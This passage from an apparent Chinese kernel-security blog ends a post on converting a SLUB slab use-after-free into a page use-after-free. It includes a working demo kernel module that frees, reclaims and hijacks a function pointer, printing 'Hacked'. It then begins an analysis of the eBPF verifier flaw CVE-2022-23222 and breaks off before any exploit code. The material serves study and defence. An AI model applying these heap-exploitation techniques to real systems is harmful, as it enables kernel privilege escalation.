<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// #define slub_cpu_partial(s) ((s)->cpu_partial)</span></span><br><span class="line"><span class="function"><span class="keyword">static</span> <span class="keyword">void</span> <span class="title">put_cpu_partial</span><span class="params">(struct kmem_cache *s, struct page *page, <span class="keyword">int</span> drain)</span></span></span><br><span class="line">...</span><br><span class="line"> oldpage = this_cpu_read(s->cpu_slab->partial);</span><br><span class="line"> pobjects = oldpage->pobjects;</span><br><span class="line"> **<span class="keyword">if</span> (drain && pobjects > slub_cpu_partial(s)) {**</span><br><span class="line"> ...</span><br><span class="line"> unfreeze_partials(s, this_cpu_ptr(s->cpu_slab));</span><br></pre></td></tr></table></figure>
<p><strong>条件三:</strong></p>
<p>object 所在 page 位于 <code>freelist</code> 且 <code>page.inuse</code>为 0</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">static</span> <span class="keyword">void</span> <span class="title">unfreeze_partials</span><span class="params">(struct kmem_cache *s,</span></span></span><br><span class="line"><span class="function"><span class="params"> struct kmem_cache_cpu *c)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line">...</span><br><span class="line"> <span class="keyword">while</span> ((page = slub_percpu_partial(c))) {</span><br><span class="line">...</span><br><span class="line"> **<span class="keyword">if</span> (unlikely(!<span class="keyword">new</span>.inuse && n->nr_partial >= s->min_partial)) {**</span><br><span class="line"> page->next = discard_page;</span><br><span class="line"> **discard_page = page;**</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line">...</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line">...</span><br><span class="line"> <span class="keyword">while</span> (discard_page) {</span><br><span class="line"> page = discard_page;</span><br><span class="line"> discard_page = discard_page->next;</span><br><span class="line"></span><br><span class="line"> stat(s, DEACTIVATE_EMPTY);</span><br><span class="line"> **discard_slab(s, page);**</span><br><span class="line"> stat(s, FREE_SLAB);</span><br><span class="line"> }</span><br></pre></td></tr></table></figure>
<hr>
<p><strong>触发方法:</strong></p>
<ul>
<li>创建一批 objects 占满 cpu_partial + 2 个 pages, 保证 free 的时候 <code>page->pobjects > (s)->cpu_partial</code></li>
<li>创建 objects 占据一个新的 page ,但不占满,保证 <code>c->page</code> 指向这个 page</li>
<li>free 掉一个 page 的所有 objects, 使这个 page 的 <code>page.inuse == 0</code></li>
<li>剩下的每个 page free 一个 object 用完 partial list 后就会 free 掉目标 page</li>
</ul>
<p>代码如下: </p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * 通过 free slab objects free 掉一个 page, 然后 UAF 利用</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment">➜ ~ uname -r</span></span><br><span class="line"><span class="comment">5.10.90</span></span><br><span class="line"><span class="comment"> * */</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><linux/module.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><linux/kernel.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><linux/init.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><linux/mm.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><linux/slab.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><linux/slub_def.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><linux/sched.h></span></span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> OBJ_SIZE 256</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> OBJ_NUM (16 * 16)</span></span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">my_struct</span> {</span></span><br><span class="line"> <span class="keyword">union</span> {</span><br><span class="line"> <span class="keyword">char</span> data[OBJ_SIZE];</span><br><span class="line"> <span class="class"><span class="keyword">struct</span> {</span></span><br><span class="line"> <span class="keyword">void</span> (*func)(<span class="keyword">void</span>);</span><br><span class="line"> <span class="keyword">char</span> paddings[OBJ_SIZE - <span class="number">8</span>];</span><br><span class="line"> };</span><br><span class="line"> };</span><br><span class="line">} __attribute__((aligned(OBJ_SIZE)));</span><br><span class="line"></span><br><span class="line"><span class="keyword">static</span> <span class="class"><span class="keyword">struct</span> <span class="title">kmem_cache</span> *<span class="title">my_cachep</span>;</span></span><br><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">my_struct</span> **<span class="title">tmp_ms</span>;</span></span><br><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">my_struct</span> *<span class="title">ms</span>;</span></span><br><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">my_struct</span> *<span class="title">random_ms</span>;</span></span><br><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">page</span> *<span class="title">target</span>;</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">hello_func</span><span class="params">(<span class="keyword">void</span>)</span></span>{</span><br><span class="line"> pr_info(<span class="string">"Hello\n"</span>);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">hack_func</span><span class="params">(<span class="keyword">void</span>)</span></span>{</span><br><span class="line"> pr_info(<span class="string">"Hacked\n"</span>);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">static</span> <span class="keyword">int</span> __init <span class="title">km_init</span><span class="params">(<span class="keyword">void</span>)</span></span>{</span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> OO_SHIFT 16</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> OO_MASK ((1 << OO_SHIFT) - 1)</span></span><br><span class="line"> <span class="keyword">int</span> i, cpu_partial, objs_per_slab;</span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">page</span> *<span class="title">target</span>;</span></span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">page</span> *<span class="title">realloc</span>;</span></span><br><span class="line"> <span class="keyword">void</span> *p;</span><br><span class="line"></span><br><span class="line"> tmp_ms = kmalloc(OBJ_NUM * <span class="number">8</span>, GFP_KERNEL);</span><br><span class="line"> my_cachep = kmem_cache_create(<span class="string">"my_struct"</span>, <span class="keyword">sizeof</span>(struct my_struct), <span class="number">0</span>,</span><br><span class="line"> SLAB_HWCACHE_ALIGN | SLAB_PANIC | SLAB_ACCOUNT,<span class="literal">NULL</span>);</span><br><span class="line"></span><br><span class="line"> pr_info(<span class="string">"%s\n"</span>, my_cachep->name);</span><br><span class="line"> pr_info(<span class="string">"cpu_partial: %d\n"</span>, my_cachep->cpu_partial);</span><br><span class="line"> pr_info(<span class="string">"objs_per_slab: %u\n"</span>, my_cachep->oo.x & OO_MASK);</span><br><span class="line"> pr_info(<span class="string">"\n"</span>);</span><br><span class="line"></span><br><span class="line"> cpu_partial = my_cachep->cpu_partial;</span><br><span class="line"> objs_per_slab = my_cachep->oo.x & OO_MASK;</span><br><span class="line"></span><br><span class="line"> random_ms = kmem_cache_alloc(my_cachep, GFP_KERNEL);</span><br><span class="line"></span><br><span class="line"> <span class="comment">// 16 * 14</span></span><br><span class="line"> <span class="keyword">for</span>(i = <span class="number">0</span>; i < (objs_per_slab * (cpu_partial + <span class="number">1</span>)); i++){</span><br><span class="line"> tmp_ms[i] = kmem_cache_alloc(my_cachep, GFP_KERNEL);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="comment">// 15</span></span><br><span class="line"> <span class="keyword">for</span>(i = (objs_per_slab * (cpu_partial + <span class="number">1</span>));</span><br><span class="line"> i < objs_per_slab * (cpu_partial + <span class="number">2</span>) - <span class="number">1</span>; i++){</span><br><span class="line"> tmp_ms[i] = kmem_cache_alloc(my_cachep, GFP_KERNEL);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="comment">// free normal object</span></span><br><span class="line"> ms = kmem_cache_alloc(my_cachep, GFP_KERNEL);</span><br><span class="line"> target = virt_to_page(ms);</span><br><span class="line"> pr_info(<span class="string">"target page: %px\n"</span>, target);</span><br><span class="line"> ms->func = (<span class="keyword">void</span> *)hello_func;</span><br><span class="line"> ms->func();</span><br><span class="line"> kmem_cache_free(my_cachep, ms);</span><br><span class="line"></span><br><span class="line"> <span class="comment">// 17</span></span><br><span class="line"> <span class="keyword">for</span>(i = objs_per_slab * (cpu_partial + <span class="number">2</span>) - <span class="number">1</span>;</span><br><span class="line"> i < objs_per_slab * (cpu_partial + <span class="number">2</span>) - <span class="number">1</span> + (objs_per_slab + <span class="number">1</span>); i++){</span><br><span class="line"> tmp_ms[i] = kmem_cache_alloc(my_cachep, GFP_KERNEL);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="comment">// free page</span></span><br><span class="line"> <span class="keyword">for</span>(i = (objs_per_slab * (cpu_partial + <span class="number">1</span>));</span><br><span class="line"> i < objs_per_slab * (cpu_partial + <span class="number">2</span>) - <span class="number">1</span>; i++){</span><br><span class="line"></span><br><span class="line"> kmem_cache_free(my_cachep, tmp_ms[i]);</span><br><span class="line"> tmp_ms[i] = <span class="literal">NULL</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">for</span>(i = objs_per_slab * (cpu_partial + <span class="number">2</span>) - <span class="number">1</span>;</span><br><span class="line"> i < objs_per_slab * (cpu_partial + <span class="number">2</span>) - <span class="number">1</span> + (objs_per_slab + <span class="number">1</span>); i++){</span><br><span class="line"> kmem_cache_free(my_cachep, tmp_ms[i]);</span><br><span class="line"> tmp_ms[i] = <span class="literal">NULL</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">for</span>(i = <span class="number">0</span>; i < (objs_per_slab * (cpu_partial + <span class="number">1</span>)); i++){</span><br><span class="line"> <span class="keyword">if</span>(i % objs_per_slab == <span class="number">0</span>){</span><br><span class="line"> kmem_cache_free(my_cachep, tmp_ms[i]);</span><br><span class="line"> tmp_ms[i] = <span class="literal">NULL</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="comment">// in other evil task</span></span><br><span class="line"> <span class="built_in">realloc</span> = alloc_page(GFP_KERNEL);</span><br><span class="line"> <span class="keyword">if</span>(<span class="built_in">realloc</span> == target){</span><br><span class="line"> pr_info(<span class="string">"[+] Realloc success!!!\n"</span>);</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> p = page_address(<span class="built_in">realloc</span>);</span><br><span class="line"> <span class="keyword">for</span>(i = <span class="number">0</span>; i< PAGE_SIZE/<span class="number">8</span>; i++){</span><br><span class="line"> ((<span class="keyword">void</span> **)p)[i] = (<span class="keyword">void</span> *)hack_func;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="comment">// UAF</span></span><br><span class="line"> <span class="keyword">if</span>(<span class="number">0</span>)</span><br><span class="line"> <span class="keyword">return</span>;</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> ms->func();</span><br><span class="line"></span><br><span class="line"> free_page((<span class="keyword">unsigned</span> <span class="keyword">long</span>)p);</span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">static</span> <span class="keyword">void</span> __exit <span class="title">km_exit</span><span class="params">(<span class="keyword">void</span>)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="keyword">int</span> i;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">for</span>(i = <span class="number">0</span>; i < OBJ_NUM; i++){</span><br><span class="line"> <span class="keyword">if</span>(tmp_ms[i])</span><br><span class="line"> kmem_cache_free(my_cachep, tmp_ms[i]);</span><br><span class="line"> }</span><br><span class="line"> kmem_cache_free(my_cachep, random_ms);</span><br><span class="line"> kmem_cache_destroy(my_cachep);</span><br><span class="line"> kfree(tmp_ms);</span><br><span class="line"> pr_info(<span class="string">"Bye\n"</span>);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">module_init(km_init);</span><br><span class="line">module_exit(km_exit);</span><br><span class="line"></span><br><span class="line">MODULE_LICENSE(<span class="string">"GPL"</span>);</span><br><span class="line">MODULE_AUTHOR(<span class="string">"X++D"</span>);</span><br><span class="line">MODULE_DESCRIPTION(<span class="string">"Kernel xxx Module."</span>);</span><br><span class="line">MODULE_VERSION(<span class="string">"0.1"</span>);</span><br></pre></td></tr></table></figure>
</div>
<footer class="article-footer">
<a data-url="http://yoursite.com/2023/02/01/slabUaf-to-pageUaf/" data-id="cmd5slr2l000n0lo1flr2fegh" class="article-share-link">Share</a>
</footer>
</div>
</article>
<article id="post-2022/07/04/CVE-2022-23222" class="article article-type-post" itemscope itemprop="blogPost">
<div class="article-meta">
<a href="2022/07/04/CVE-2022-23222/" class="article-date">
<time datetime="2022-07-04T14:00:00.000Z" itemprop="datePublished">2022-07-04</time>
</a>
</div>
<div class="article-inner">
<header class="article-header">
<h1 itemprop="name">
<a class="article-title" href="2022/07/04/CVE-2022-23222/">CVE-2022-23222 eBPF verifier 提权漏洞利用分析</a>
</h1>
</header>
<div class="article-entry" itemprop="articleBody">
<h1 id="CVE-2022-23222-漏洞分析"><a href="#CVE-2022-23222-漏洞分析" class="headerlink" title="CVE-2022-23222 漏洞分析"></a>CVE-2022-23222 漏洞分析</h1><p>author: moxingyuan from iceswordlab</p>
<h2 id="一、漏洞背景"><a href="#一、漏洞背景" class="headerlink" title="一、漏洞背景"></a>一、漏洞背景</h2><p>CVE-2022-23222 是一个 Linux 内核漏洞,其成因为 eBPF verifier 未阻止某些 *OR_NULL 类型指针的算数加减运算。利用该漏洞可导致权限提升。</p>
<p>受该漏洞影响的内核版本范围为 5.8 - 5.16 。</p>
<p>该漏洞分别在内核版本 5.10.92、5.15.15、5.16.1 中被修复,其中,5.10.92 版本修复该漏洞的 commit 为 [35ab8c9085b0af847df7fac9571ccd26d9f0f513](<a href="https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=35ab8c9085b0af847df7fac9571ccd26d9f0f513" target="_blank" rel="noopener">kernel/git/stable/linux.git - Linux kernel stable tree</a>) 。</p>
<h2 id="二、漏洞成因"><a href="#二、漏洞成因" class="headerlink" title="二、漏洞成因"></a>二、漏洞成因</h2><p>漏洞形成于 kernel/bpf/verifier.c 的 adjust_ptr_min_max_vals 函数:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">static</span> <span class="keyword">int</span> <span class="title">adjust_ptr_min_max_vals</span><span class="params">(struct bpf_verifier_env *env,</span></span></span><br><span class="line"><span class="function"><span class="params"> struct bpf_insn *insn,</span></span></span><br><span class="line"><span class="function"><span class="params"> <span class="keyword">const</span> struct bpf_reg_state *ptr_reg,</span></span></span><br><span class="line"><span class="function"><span class="params"> <span class="keyword">const</span> struct bpf_reg_state *off_reg)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> ...</span><br><span class="line"></span><br><span class="line"> <span class="keyword">switch</span> (ptr_reg->type) {</span><br><span class="line"> <span class="keyword">case</span> PTR_TO_MAP_VALUE_OR_NULL:</span><br><span class="line"> verbose(env, <span class="string">"R%d pointer arithmetic on %s prohibited, null-check it first\n"</span>,</span><br><span class="line"> dst, reg_type_str[ptr_reg->type]);</span><br><span class="line"> <span class="keyword">return</span> -EACCES;</span><br><span class="line"> <span class="keyword">case</span> CONST_PTR_TO_MAP:</span><br><span class="line"> <span class="comment">/* smin_val represents the known value */</span></span><br><span class="line"> <span class="keyword">if</span> (known && smin_val == <span class="number">0</span> && opcode == BPF_ADD)</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> fallthrough;</span><br><span class="line"> <span class="keyword">case</span> PTR_TO_PACKET_END:</span><br><span class="line"> <span class="keyword">case</span> PTR_TO_SOCKET:</span><br><span class="line"> <span class="keyword">case</span> PTR_TO_SOCKET_OR_NULL:</span><br><span class="line"> <span class="keyword">case</span> PTR_TO_SOCK_COMMON:</span><br><span class="line"> <span class="keyword">case</span> PTR_TO_SOCK_COMMON_OR_NULL:</span><br><span class="line"> <span class="keyword">case</span> PTR_TO_TCP_SOCK:</span><br><span class="line"> <span class="keyword">case</span> PTR_TO_TCP_SOCK_OR_NULL:</span><br><span class="line"> <span class="keyword">case</span> PTR_TO_XDP_SOCK:</span><br><span class="line"> verbose(env, <span class="string">"R%d pointer arithmetic on %s prohibited\n"</span>,</span><br><span class="line"> dst, reg_type_str[ptr_reg->type]);</span><br><span class="line"> <span class="keyword">return</span> -EACCES;</span><br><span class="line"> <span class="keyword">default</span>:</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> ...</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>在禁止特定指针类型的算数加减运算时,没有列举完所有的 *OR_NULL 类型指针,导致部分 *OR_NULL 类型指针可以进行非法运算。</p>
<p>所有的 *OR_NULL 类型指针可以在枚举类型 bpf_reg_type 中找到。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">enum</span> bpf_reg_type {</span><br><span class="line"> NOT_INIT = <span class="number">0</span>, <span class="comment">/* nothing was written into register */</span></span><br><span class="line"> SCALAR_VALUE, <span class="comment">/* reg doesn't contain a valid pointer */</span></span><br><span class="line"> PTR_TO_CTX, <span class="comment">/* reg points to bpf_context */</span></span><br><span class="line"> CONST_PTR_TO_MAP, <span class="comment">/* reg points to struct bpf_map */</span></span><br><span class="line"> PTR_TO_MAP_VALUE, <span class="comment">/* reg points to map element value */</span></span><br><span class="line"> PTR_TO_MAP_VALUE_OR_NULL, <span class="comment">/* points to map elem value or NULL */</span></span><br><span class="line"> PTR_TO_STACK, <span class="comment">/* reg == frame_pointer + offset */</span></span><br><span class="line"> PTR_TO_PACKET_META, <span class="comment">/* skb->data - meta_len */</span></span><br><span class="line"> PTR_TO_PACKET, <span class="comment">/* reg points to skb->data */</span></span><br><span class="line"> PTR_TO_PACKET_END, <span class="comment">/* skb->data + headlen */</span></span><br><span class="line"> PTR_TO_FLOW_KEYS, <span class="comment">/* reg points to bpf_flow_keys */</span></span><br><span class="line"> PTR_TO_SOCKET, <span class="comment">/* reg points to struct bpf_sock */</span></span><br><span class="line"> PTR_TO_SOCKET_OR_NULL, <span class="comment">/* reg points to struct bpf_sock or NULL */</span></span><br><span class="line"> PTR_TO_SOCK_COMMON, <span class="comment">/* reg points to sock_common */</span></span><br><span class="line"> PTR_TO_SOCK_COMMON_OR_NULL, <span class="comment">/* reg points to sock_common or NULL */</span></span><br><span class="line"> PTR_TO_TCP_SOCK, <span class="comment">/* reg points to struct tcp_sock */</span></span><br><span class="line"> PTR_TO_TCP_SOCK_OR_NULL, <span class="comment">/* reg points to struct tcp_sock or NULL */</span></span><br><span class="line"> PTR_TO_TP_BUFFER, <span class="comment">/* reg points to a writable raw tp's buffer */</span></span><br><span class="line"> PTR_TO_XDP_SOCK, <span class="comment">/* reg points to struct xdp_sock */</span></span><br><span class="line"> <span class="comment">/* PTR_TO_BTF_ID points to a kernel struct that does not need</span></span><br><span class="line"><span class="comment"> * to be null checked by the BPF program. This does not imply the</span></span><br><span class="line"><span class="comment"> * pointer is _not_ null and in practice this can easily be a null</span></span><br><span class="line"><span class="comment"> * pointer when reading pointer chains. The assumption is program</span></span><br><span class="line"><span class="comment"> * context will handle null pointer dereference typically via fault</span></span><br><span class="line"><span class="comment"> * handling. The verifier must keep this in mind and can make no</span></span><br><span class="line"><span class="comment"> * assumptions about null or non-null when doing branch analysis.</span></span><br><span class="line"><span class="comment"> * Further, when passed into helpers the helpers can not, without</span></span><br><span class="line"><span class="comment"> * additional context, assume the value is non-null.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"> PTR_TO_BTF_ID,</span><br><span class="line"> <span class="comment">/* PTR_TO_BTF_ID_OR_NULL points to a kernel struct that has not</span></span><br><span class="line"><span class="comment"> * been checked for null. Used primarily to inform the verifier</span></span><br><span class="line"><span class="comment"> * an explicit null check is required for this struct.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"> PTR_TO_BTF_ID_OR_NULL,</span><br><span class="line"> PTR_TO_MEM, <span class="comment">/* reg points to valid memory region */</span></span><br><span class="line"> PTR_TO_MEM_OR_NULL, <span class="comment">/* reg points to valid memory region or NULL */</span></span><br><span class="line"> PTR_TO_RDONLY_BUF, <span class="comment">/* reg points to a readonly buffer */</span></span><br><span class="line"> PTR_TO_RDONLY_BUF_OR_NULL, <span class="comment">/* reg points to a readonly buffer or NULL */</span></span><br><span class="line"> PTR_TO_RDWR_BUF, <span class="comment">/* reg points to a read/write buffer */</span></span><br><span class="line"> PTR_TO_RDWR_BUF_OR_NULL, <span class="comment">/* reg points to a read/write buffer or NULL */</span></span><br><span class="line"> PTR_TO_PERCPU_BTF_ID, <span class="comment">/* reg points to a percpu kernel variable */</span></span><br><span class="line">};</span><br></pre></td></tr></table></figure>
<p>可发现漏掉的指针类型包括:</p>
<ul>
<li>PTR_TO_BTF_ID_OR_NULL</li>
<li>PTR_TO_MEM_OR_NULL</li>
<li>PTR_TO_RDONLY_BUF_OR_NULL</li>
<li>PTR_TO_RDWR_BUF_OR_NULL</li>
</ul>
<h2 id="三、漏洞相关知识"><a href="#三、漏洞相关知识" class="headerlink" title="三、漏洞相关知识"></a>三、漏洞相关知识</h2><p>eBPF (Extended Berkeley Packet Filter) 由 cBPF (Classic Berkeley Packet Filter) 衍生而来,是一项可在内核虚拟机中运行程序的技术。使用eBPF无需修改内核源码,或者插入驱动,对系统的入侵性相对没那么强,可以安全并有效地扩展内核的功能。</p>
<h3 id="3-1-eBPF指令"><a href="#3-1-eBPF指令" class="headerlink" title="3.1 eBPF指令"></a>3.1 eBPF指令</h3><p>eBPF 使用类似 x86 的虚拟机指令,基础指令为 8 字节,其编码格式为:</p>
<table>
<thead>
<tr>
<th align="center">32 bits (MSB)</th>
<th align="center">16 bits</th>
<th align="center">4 bits</th>
<th align="center">4 bits</th>
<th align="center">8 bits (LSB)</th>
</tr>
</thead>
<tbody><tr>
<td align="center">immediate</td>
<td align="center">offset</td>
<td align="center">source register</td>
<td align="center">destination register</td>
<td align="center">opcode</td>
</tr>
</tbody></table>
<p>扩展指令在基础指令基础上增加 8 个字节的立即数,总长度为 16 字节。</p>
<p>伪指令是内核代码中定义的方便理解记忆的助记符,通常是对真实指令的包装。</p>
<p>下文中出现的指令/伪指令及其功能如下:</p>
<table>
<thead>
<tr>
<th align="center">指令/伪指令</th>
<th align="center">功能</th>
</tr>
</thead>
<tbody><tr>
<td align="center">BPF_MOV64_REG(DST, SRC)</td>
<td align="center">dst = src</td>
</tr>
<tr>
<td align="center">BPF_MOV64_IMM(DST, IMM)</td>
<td align="center">dst_reg = imm32</td>
</tr>
<tr>
<td align="center">BPF_ST_MEM(SIZE, DST, OFF, IMM)</td>
<td align="center">*(uint *) (dst_reg + off16) = imm32</td>
</tr>
<tr>
<td align="center">BPF_STX_MEM(SIZE, DST, SRC, OFF)</td>
<td align="center">*(uint *) (dst_reg + off16) = src_reg</td>
</tr>
<tr>
<td align="center">BPF_LDX_MEM(SIZE, DST, SRC, OFF)</td>
<td align="center">dst_reg = *(uint *) (src_reg + off16)</td>
</tr>
